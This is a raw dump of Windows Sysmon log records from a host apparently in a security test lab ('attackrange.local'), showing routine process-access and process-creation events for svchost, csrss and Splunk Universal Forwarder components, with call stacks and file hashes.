13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.690{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.783{59A5CD1D-90CD-6005-4001-00000000A301}30524880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.502{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 